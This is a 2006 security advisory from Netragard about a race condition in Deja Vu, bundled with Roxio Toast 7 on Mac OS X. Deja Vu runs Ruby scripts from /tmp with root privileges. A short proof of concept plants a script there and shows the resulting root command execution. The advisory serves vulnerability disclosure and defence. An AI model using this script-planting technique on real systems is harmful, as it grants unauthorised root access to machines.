******************** Netragard,  L.L.C  Advisory* *******************
09/11/2006                 

                     Strategic Reconnaissance Team
              ------------------------------------------------
              http://www.netragard.com -- "We make I.T. Safe."


[About Netragard]
----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems and Applications
commonly used by businesses internationally. We apply the knowledge
gained by performing this research to our professional security
services. This in turn enables us to produce high quality deliverables
that are the product of talented security professionals and not those
of automated scanners and tools.  This advisory is the product of
research done by the Strategic Reconnaissance Team.


   [ For more information please visit http://www.netragard.com ]


[Advisory Information]
----------------------------------------------------------------------
Contact               : Adriel T. Desautels
Advisory ID           : NETRAGARD-20060624
Product Name          : Roxio Toast
Product Version       : 7 Titanium
Vendor Name           : Sonic Solutions / Propaganda Productions
Type of Vulnerability : Local Root Compromise
Effort                : Difficult, depends on timing.
Operating System      : OSX
Other                 : Race Condition Explpoitation in Deja Vu which
                        is bundled into Roxio Toast. Deja Vu is the
                        product of Propaganda Productions.

Official Advisory URL:
----------------------------------------------------------------------
http://www.netragard.com/pdfs/research/ROXIO_RACE_NETRAGARD-20060624.txt


[Product Description]
----------------------------------------------------------------------
"Toast 7 is the best way to save, share and enjoy a lifetime of digital
music, movies and photos on CD and DVD. Burn large files across
multiple discs; compress and copy DVD movies; add over 50 hours of
music to an audio DVD with on-screen TV menus, shuffle play, and rich
Dolby Digital sound; burn DivX files into DVDs. Do it all with the
fastest and most reliable burning software for the Mac OS - Toast."



--http://www.roxio.com--


[Technical Summary]
----------------------------------------------------------------------
Deja Vu, which is bundled with Roxio Toast 7, creates ruby scripts in
the /tmp directory. These scripts contain commands which are executed
with escilated privileges. A race condition exists which makes it
possible to execute arbritrary commands against the system or gain
root level access.



[Technical Details]
----------------------------------------------------------------------
This was tested using a configured version of Roxio Toast 7 Titanium.
(reproduction depends on timing)



######################################################################
#
#    dejavu_manual.rb was created by user test
#
######################################################################
netragard-test> ls -al /tmp/dejavu_manual.rb
-rw-r--r--   1 test wheel  32843 Jul  7 21:41 /tmp/dejavu_manual.rb


######################################################################
#
#    The contents of dejavu_manual.rb
#
######################################################################
netragard-test>cat test.rb
#!/usr/bin/ruby
system '/usr/bin/id'


######################################################################
#
#    1) Open the System Preferences
#    2) Click on deja vu
#    3) Perform a manual backup.
#    4) Notice uid=0(root)
#
######################################################################
netragard-test> /Applications/System\ Preferences.app/Contents/MacOS/
System\ Preferences


uid=0(root) gid=501(test) groups=501(test),
81(appserveradm), 79(appserverusr), 80(admin)



[Proof Of Concept]  
----------------------------------------------------------------------
Demonstrated above.



[Vendor Status]
----------------------------------------------------------------------
Propaganda Productions was notified by Sonic Solutions on behalf of
Netragard, L.L.C. on August 10th 2006. As of today Netragard has not
received any response from Propaganda Productions.


[Disclaimer]
---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.


Regards,
    Netragard Strategic Reconnaissance Team
    advisories at netragard dot com
    http://www.netragard.com
    -------------------------
    "We make I.T. Secure"